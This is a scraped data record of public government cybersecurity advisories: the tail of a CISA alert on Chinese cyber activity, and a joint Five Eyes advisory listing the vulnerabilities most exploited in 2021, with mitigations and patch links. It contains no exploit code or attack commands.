\n[CVE-2020-8515](<https://nvd.nist.gov/vuln/detail/CVE-2020-8515>) | \n\n * DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices\n| \n\n * [Draytek Security Advisory: Vigor3900 / Vigor2960 / Vigor300B Router Web Management Page Vulnerability (CVE-2020-8515)](<https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-\\(cve-2020-8515\\)/>) \n \n 2. **Implement rigorous configuration management programs. **Audit configuration management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Implementing a robust configuration and patch management program hinders sophisticated APT operations by limiting the effectiveness of opportunistic attacks. \n\n 3. **Disable unnecessary ports, protocols, and services.** Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for C2 activity. Turn off or disable any unnecessary services or functionality within devices (e.g., universal plug and play [UPnP], PowerShell). \n\n 4. **Enhance monitoring of network and email traffic.** Review network signatures and indicators for focused operations activities, monitor for new phishing themes, and adjust email rules accordingly. Follow best practices of restricting attachments via email. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. \n\n 5. **Use protection capabilities to stop malicious activity.** Implement antivirus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use network intrusion detection and prevention systems to identify and prevent commonly employed adversarial malware and limit nefarious data transfers.\n\n### Contact Information\n\nCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:\n\n * 1-888-282-0870 (From outside the United States: +1-703-235-8832)\n * [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>) (UNCLASS)\n\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA homepage at <http://www.us-cert.cisa.gov/>.\n\n### References\n\n[[1] White House Publication: How China\u2019s Economic Aggression Threatens the Technologies and Intellectual Property of the United States and the World ](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)\n\n[[2] Congressional Research Services: 'Made in China 2025' Industrial Policies: Issues for Congress ](<https://fas.org/sgp/crs/row/IF10964.pdf>)\n\n[[3] Council on Foreign Relations: Is \u2018Made in China 2025\u2019 a Threat to Global Trade ](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)\n\n[[4] Mandiant: APT1 Exposing One of China\u2019s Cyber Espionage Units ](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)\n\n[[5] U.S. Department of Justice (DOJ) Press Release: U.S. Charges Five Chinese Military Hackers for Cyber Espionage Against U.S. Corporations and a Labor Organization for Commercial Advantage](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)\n\n[[6] CISA Alert TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)\n\n[[7] DOJ Press Release: Deputy Attorney General Rod J. Rodenstein Announces Charges Against Chinese Hackers](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)\n\n[[8] CISA Awareness Briefing: Chinese Cyber Activity Targeting Managed Service Providers](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)\n\n[[9] DOJ Press Release: Deputy Attorney General William P. Barr Announces Indictment of Four Members of China\u2019s Military for Hacking into Equifax](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)\n\n[[10] CISA Press Release: FBI and CISA Warn Against Chinese Targeting of COVID-19 Research Organizations ](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)\n\n[[11] CISA Alert AA20-126A: APT Groups Target Healthcare and Essential Services](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)\n\n[[12] CISA Current Activity (CA): Chinese Malicious Cyber Activity](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity>)\n\n[[13] FireEye Advanced Persistent Threat Groups](<https://www.fireeye.com/current-threats/apt-groups.html>)\n\n[[14] MITRE ATT&amp;CK: APT3](<https://attack.mitre.org/groups/G0022/>)\n\n[[15] MITRE ATT&amp;CK: APT19](<https://attack.mitre.org/groups/G0073/>)\n\n[[16] MITRE ATT&amp;CK: APT41](<https://attack.mitre.org/groups/G0096/>)\n\n[[17] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[18] CISA Alert AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)\n\n[[19] CISA CA: F5 Releases Security Advisory for BIP-IP TMUI RCE Vulnerability, CVE-2020-5902](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)\n\n[[20] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[21] NSA Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)\n\n### Revisions\n\nOctober 1, 2020: Initial Version|October 20, 2020: Recommended Actions Section Updated\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-20T12:00:00", "type": "ics", "title": "Potential for China Cyber Response to Heightened U.S.\u2013China Tensions", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2015-4852", "CVE-2017-6327", "CVE-2017-6328", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-16278", "CVE-2019-1652", "CVE-2019-1653", "CVE-2019-16920", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1040", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-6789", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-20T12:00:00", "id": "AA20-275A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-275a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:27:11", "description": "### Summary\n\nThis joint Cybersecurity Advisory (CSA) was coauthored by cybersecurity authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom: the Cybersecurity and Infrastructure Security Agency ([CISA](<https://www.cisa.gov/>)), National Security Agency ([NSA](<https://www.nsa.gov/Cybersecurity/>)), Federal Bureau of Investigation ([FBI](<https://www.fbi.gov/investigate/cyber>)), Australian Cyber Security Centre ([ACSC](<https://www.cyber.gov.au/>)), Canadian Centre for Cyber Security ([CCCS](<https://www.cyber.gc.ca/en/>)), New Zealand National Cyber Security Centre ([NZ NCSC](<https://www.gcsb.govt.nz/>)), and United Kingdom\u2019s National Cyber Security Centre ([NCSC-UK](<https://www.ncsc.gov.uk/>)). This advisory provides details on the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nU.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities assess, in 2021, malicious cyber actors aggressively targeted newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide. To a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities across a broad spectrum of targets. \n\nThe cybersecurity authorities encourage organizations to apply the recommendations in the Mitigations section of this CSA. These mitigations include applying timely patches to systems and implementing a centralized patch management system to reduce the risk of compromise by malicious cyber actors.\n\nDownload the Joint Cybersecurity Advisory: 2021 top Routinely Exploited Vulnerabilities (pdf, 777kb).\n\n### Technical Details\n\n#### **Key Findings**\n\nGlobally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability\u2019s disclosure, likely facilitating exploitation by a broader range of malicious actors.\n\nTo a lesser extent, malicious cyber actors continued to exploit publicly known, dated software vulnerabilities\u2014some of which were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) or earlier. The exploitation of older vulnerabilities demonstrates the continued risk to organizations that fail to patch software in a timely manner or are using software that is no longer supported by a vendor.\n\n#### **Top 15 Routinely Exploited Vulnerabilities**\n\nTable 1 shows the top 15 vulnerabilities U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities observed malicious actors routinely exploiting in 2021, which include:\n\n * **CVE-2021-44228.** This vulnerability, known as Log4Shell, affects Apache\u2019s Log4j library, an open-source logging framework. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. The request allows a cyber actor to take full control over the system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[1] Log4j is incorporated into thousands of products worldwide. This vulnerability was disclosed in December 2021; the rapid widespread exploitation of this vulnerability demonstrates the ability of malicious actors to quickly weaponize known vulnerabilities and target organizations before they patch.\n * **CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065.** These vulnerabilities, known as ProxyLogon, affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., \u201cvulnerability chaining\u201d) allows an unauthenticated cyber actor to execute arbitrary code on vulnerable Exchange Servers, which, in turn, enables the actor to gain persistent access to files and mailboxes on the servers, as well as to credentials stored on the servers. Successful exploitation may additionally enable the cyber actor to compromise trust and identity in a vulnerable network.\n * **CVE-2021-34523, CVE-2021-34473, CVE-2021-31207.** These vulnerabilities, known as ProxyShell, also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft\u2019s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers. \n * **CVE-2021-26084.** This vulnerability, affecting Atlassian Confluence Server and Data Center, could enable an unauthenticated actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a POC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.\n\nThree of the top 15 routinely exploited vulnerabilities were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>): CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510. Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors.\n\n_Table 1: Top 15 Routinely Exploited Vulnerabilities in 2021_\n\nCVE\n\n| \n\nVulnerability Name\n\n| \n\nVendor and Product\n\n| \n\nType \n \n---|---|---|--- \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\n| \n\nLog4Shell\n\n| \n\nApache Log4j\n\n| \n\nRemote code execution (RCE) \n \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)\n\n| \n\n| \n\nZoho ManageEngine AD SelfService Plus\n\n| \n\nRCE \n \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n| \n\nProxyShell\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nElevation of privilege \n \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n\n| \n\nProxyShell\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n\n| \n\nProxyShell\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nSecurity feature bypass \n \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)\n\n| \n\nProxyLogon\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)\n\n| \n\nProxyLogon\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)\n\n| \n\nProxyLogon\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)\n\n| \n\nProxyLogon\n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)\n\n| \n\n| \n\nAtlassian Confluence Server and Data Center\n\n| \n\nArbitrary code execution \n \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)\n\n| \n\n| \n\nVMware vSphere Client\n\n| \n\nRCE \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\n\n| \n\nZeroLogon\n\n| \n\nMicrosoft Netlogon Remote Protocol (MS-NRPC)\n\n| \n\nElevation of privilege \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n| \n\nMicrosoft Exchange Server\n\n| \n\nRCE \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n| \n\nPulse Secure Pulse Connect Secure\n\n| \n\nArbitrary file reading \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n\n| \n\n| \n\nFortinet FortiOS and FortiProxy\n\n| \n\nPath traversal \n \n#### **Additional Routinely Exploited Vulnerabilities**\n\nIn addition to the 15 vulnerabilities listed in table 1, U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities identified vulnerabilities, listed in table 2, that were also routinely exploited by malicious cyber actors in 2021. \n\nThese vulnerabilities include multiple vulnerabilities affecting internet-facing systems, including Accellion File Transfer Appliance (FTA), Windows Print Spooler, and Pulse Secure Pulse Connect Secure. Three of these vulnerabilities were also [routinely exploited in 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>): CVE-2019-19781, CVE-2019-18935, and CVE-2017-11882.\n\n_Table 2: Additional Routinely Exploited Vulnerabilities in 2021_\n\nCVE\n\n| \n\nVendor and Product\n\n| \n\nType \n \n---|---|--- \n \n[CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>)\n\n| \n\nSitecore XP\n\n| \n\nRCE \n \n[CVE-2021-35464](<https://nvd.nist.gov/vuln/detail/CVE-2021-35464>)\n\n| \n\nForgeRock OpenAM server\n\n| \n\nRCE \n \n[CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n\n| \n\nAccellion FTA\n\n| \n\nOS command execution \n \n[CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>)\n\n| \n\nAccellion FTA\n\n| \n\nServer-side request forgery \n \n[CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>)\n\n| \n\nAccellion FTA\n\n| \n\nOS command execution \n \n[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>)\n\n| \n\nAccellion FTA\n\n| \n\nSQL injection \n \n[CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n\n| \n\nVMware vCenter Server\n\n| \n\nRCE \n \n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038>)\n\n| \n\nSonicWall Secure Mobile Access (SMA)\n\n| \n\nRCE \n \n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>)\n\n| \n\nMicrosoft MSHTML\n\n| \n\nRCE \n \n[CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>)\n\n| \n\nMicrosoft Windows Print Spooler\n\n| \n\nRCE \n \n[CVE-2021-3156](<https://nvd.nist.gov/vuln/detail/CVE-2021-3156>)\n\n| \n\nSudo\n\n| \n\nPrivilege escalation \n \n[CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>)\n\n| \n\nCheckbox Survey\n\n| \n\nRemote arbitrary code execution \n \n[CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>)\n\n| \n\nPulse Secure Pulse Connect Secure\n\n| \n\nRemote arbitrary code execution \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016>)\n\n| \n\nSonicWall SSLVPN SMA100\n\n| \n\nImproper SQL command neutralization, allowing for credential access \n \n[CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>)\n\n| \n\nWindows Print Spooler\n\n| \n\nRCE \n \n[CVE-2020-2509](<https://nvd.nist.gov/vuln/detail/CVE-2020-2509>)\n\n| \n\nQNAP QTS and QuTS hero\n\n| \n\nRemote arbitrary code execution \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\nCitrix Application Delivery Controller (ADC) and Gateway\n\n| \n\nArbitrary code execution \n \n[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>)\n\n| \n\nProgress Telerik UI for ASP.NET AJAX\n\n| \n\nCode execution \n \n[CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>)\n\n| \n\nCisco IOS Software and IOS XE Software\n\n| \n\nRemote arbitrary code execution \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)\n\n| \n\nMicrosoft Office\n\n| \n\nRCE \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>)\n\n| \n\nMicrosoft Office\n\n| \n\nRCE \n \n### Mitigations\n\n#### **Vulnerability and Configuration Management**\n\n * Update software, operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), especially those CVEs identified in this CSA, and then critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment. For patch information on CVEs identified in this CSA, refer to the appendix. \n * If a patch for a known exploited or critical vulnerability cannot be quickly applied, implement vendor-approved workarounds.\n * Use a centralized patch management system.\n * Replace end-of-life software, i.e., software that is no longer supported by the vendor. For example, Accellion FTA was retired in April 2021.\n * Organizations that are unable to perform rapid scanning and patching of internet-facing systems should consider moving these services to mature, reputable cloud service providers (CSPs) or other managed service providers (MSPs). Reputable MSPs can patch applications\u2014such as webmail, file storage, file sharing, and chat and other employee collaboration tools\u2014for their customers. However, as MSPs and CSPs expand their client organization's attack surface and may introduce unanticipated risks, organizations should proactively collaborate with their MSPs and CSPs to jointly reduce that risk. For more information and guidance, see the following resources. \n * CISA Insights [Risk Considerations for Managed Service Provider Customers](<https://cisa.gov/sites/default/files/publications/cisa-insights_risk-considerations-for-msp-customers_508.pdf>)\n * CISA Insights [Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses](<https://cisa.gov/sites/default/files/publications/CISA Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>)\n * ACSC advice on [How to Manage Your Security When Engaging a Managed Service Provider](<https://www.cyber.gov.au/acsc/view-all-content/publications/how-manage-your-security-when-engaging-managed-service-provider>)\n\n#### **Identity and Access Management**\n\n * Enforce multifactor authentication (MFA) for all users, without exception.\n * Enforce MFA on all VPN connections. If MFA is unavailable, require employees engaging in remote work to use strong passwords. \n * Regularly review, validate, or remove privileged accounts (annually at a minimum).\n * Configure access control under the concept of least privilege principle. \n * Ensure software service accounts only provide necessary permissions (least privilege) to perform intended functions (non-administrative privileges).\n\n**Note:** see [CISA Capacity Enhancement Guide \u2013 Implementing Strong Authentication](<https://cisa.gov/sites/default/files/publications/CISA_CEG_Implementing_Strong_Authentication_508_1.pdf>) and ACSC guidance on [Implementing Multi-Factor Authentication](<https://www.cyber.gov.au/acsc/view-all-content/publications/implementing-multi-factor-authentication>) for more information on hardening authentication systems.\n\n#### **Protective Controls and Architecture **\n\n * Properly configure and secure internet-facing network devices, disable unused or unnecessary network ports and protocols, encrypt network traffic, and disable unused network services and devices. \n * Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.\n * Manage Windows Key Distribution Center (KDC) accounts (e.g., KRBTGT) to minimize Golden Ticket attacks and Kerberoasting.\n * Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).\n * Segment networks to limit or block lateral movement by controlling access to applications, devices, and databases. Use private virtual local area networks. \n * Continuously monitor the attack surface and investigate abnormal activity that may indicate lateral movement of a threat actor or malware. \n * Use security tools, such as endpoint detection and response (EDR) and security information and event management (SIEM) tools. Consider using an information technology asset management (ITAM) solution to ensure your EDR, SIEM, vulnerability scanner etc., are reporting the same number of assets.\n * Monitor the environment for potentially unwanted programs.\n * Reduce third-party applications and unique system/application builds; provide exceptions only if required to support business critical functions.\n * Implement application allowlisting. \n\n### **Resources**\n\n * For the top vulnerabilities exploited in 2020, see joint CSA [Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>)\n * For the top exploited vulnerabilities 2016 through 2019, see joint CSA [Top 10 Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa20-133a>). \n * See the appendix for additional partner resources on the vulnerabilities mentioned in this CSA.\n\n### **Disclaimer**\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. CISA, the FBI, NSA, ACSC, CCCS, NZ NCSC, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### **Purpose **\n\nThis document was developed by U.S., Australian, Canadian, New Zealand, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.\n\n### **References**\n\n[1] [CISA\u2019s Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>)\n\n### **Appendix: Patch Information and Additional Resources for Top Exploited Vulnerabilities**\n\nCVE\n\n| \n\nVendor\n\n| \n\nAffected Products\n\n| \n\nPatch Information\n\n| \n\nResources \n \n---|---|---|---|--- \n \n[CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>)\n\n| \n\nSitecore\n\n| \n\nSitecore XP 7.5.0 - Sitecore XP 7.5.2\n\nSitecore XP 8.0.0 - Sitecore XP 8.2.7\n\n| \n\n[Sitecore Security Bulletin SC2021-003-499266](<https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776#HistoryOfUpdates>)\n\n| \n\nACSC Alert [Active Exploitation of vulnerable Sitecore Experience Platform Content Management Systems](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerable-sitecore-experience-platform-content-management-systems>) \n \n[CVE-2021-35464](<https://nvd.nist.gov/vuln/detail/CVE-2021-35464>)\n\n| \n\nForgeRock \n\n| \n\nAccess Management (AM) 5.x, 6.0.0.x, 6.5.0.x, 6.5.1, 6.5.2.x and 6.5.3\n\nOpenAM 9.x, 10.x, 11.x, 12.x and 13.x\n\n| \n\n[ForgeRock AM Security Advisory #202104](<https://backstage.forgerock.com/knowledge/kb/article/a47894244>)\n\n| \n\nACSC Advisory [Active exploitation of ForgeRock Access Manager / OpenAM servers](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2021-004-active-exploitation-forgerock-access-manager-openam-servers>)\n\nCCCS [ForgeRock Security Advisory](<https://www.cyber.gc.ca/en/alerts/forgerock-security-advisory>) \n \n[CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n\n| \n\nAccellion \n\n| \n\nFTA 9_12_370 and earlier\n\n| \n\n[Accellion Press Release: Update to Recent FTA Security Incident](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-recent-fta-security-incident/>)\n\n| \n\nJoint CSA [Exploitation of Accellion File Transfer Appliance](<https://www.cisa.gov/uscert/ncas/alerts/aa21-055a>)\n\nACSC Alert [Potential Accellion File Transfer Appliance compromise](<https://www.cyber.gov.au/acsc/view-all-content/alerts/potential-accellion-file-transfer-appliance-compromise>) \n \n[CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>)\n\n| \n\nFTA 9_12_411 and earlier \n \n[CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>)\n\n| \n\nFTA versions 9_12_411 and earlier \n \n[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>)\n\n| \n\nFTA 9_12_370 and earlier\n\n| \n \n[CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n\n| \n\nVMware \n\n| \n\nvCenter Server 7.0, 6.7, 6.5\n\nCloud Foundation (vCenter Server) 4.x and 3.x\n\n| \n\n[VMware Advisory VMSA-2021-0010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>)\n\n| \n\nCCCS [VMware Security Advisory](<https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-41>) \n \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)\n\n| \n\nVMware\n\n| \n\nvCenter Server 7.0, 6.7, 6.5\n\nCloud Foundation (vCenter Server) 4.x and 3.x\n\n| \n\n[VMware Advisory VMSA-2021-0002](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>)\n\n| \n\nACSC Alert [VMware vCenter Server plugin remote code execution vulnerability](<https://www.cyber.gov.au/acsc/view-all-content/alerts/vmware-vcenter-server-plugin-remote-code-execution-vulnerability-cve-2021-21972>)\n\nCCCS [VMware Security Advisory](<https://www.cyber.gc.ca/en/alerts/vmware-security-advisory-35>)\n\nCCCS Alert [APT Actors Target U.S. and Allied Networks - Update 1](<https://www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi>) \n \n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038>)\n\n| \n\nSonicWall\n\n| \n\nSMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv\n\n| \n\n[SonicWall Security Advisory SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>)\n\n| \n\nACSC Alert [Remote code execution vulnerability present in SonicWall SMA 100 series appliances](<https://www.cyber.gov.au/acsc/view-all-content/alerts/remote-code-execution-vulnerability-present-sonicwall-sma-100-series-appliances>)\n\nCCCS [SonicWall Security Advisory](<https://www.cyber.gc.ca/en/alerts/sonicwall-security-advisory-4>) \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\n| \n\nApache\n\n| \n\nLog4j, all versions from 2.0-beta9 to 2.14.1\n\nFor other affected vendors and products, see [CISA's GitHub repository](<https://github.com/cisagov/log4j-affected-db>).\n\n| \n\n[Log4j: Apache Log4j Security Vulnerabilities](<https://logging.apache.org/log4j/2.x/security.html>)\n\nFor additional information, see joint CSA: [Mitigating Log4Shell and Other Log4j-Related Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-356a>)\n\n| \n\nCISA webpage [Apache Log4j Vulnerability Guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>)\n\nCCCS [Active exploitation of Apache Log4j vulnerability - Update 7](<https://www.cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability>) \n \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)\n\n| \n\nZoho ManageEngine \n\n| \n\nADSelfService Plus version 6113 and prior\n\n| \n\n[Zoho ManageEngine: ADSelfService Plus 6114 Security Fix Release ](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>)\n\n| \n\nJoint CSA [APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus](<https://www.cisa.gov/uscert/ncas/alerts/aa21-259a>)\n\nCCCS [Zoho Security Advisory](<https://www.cyber.gc.ca/en/alerts/zoho-security-advisory>) \n 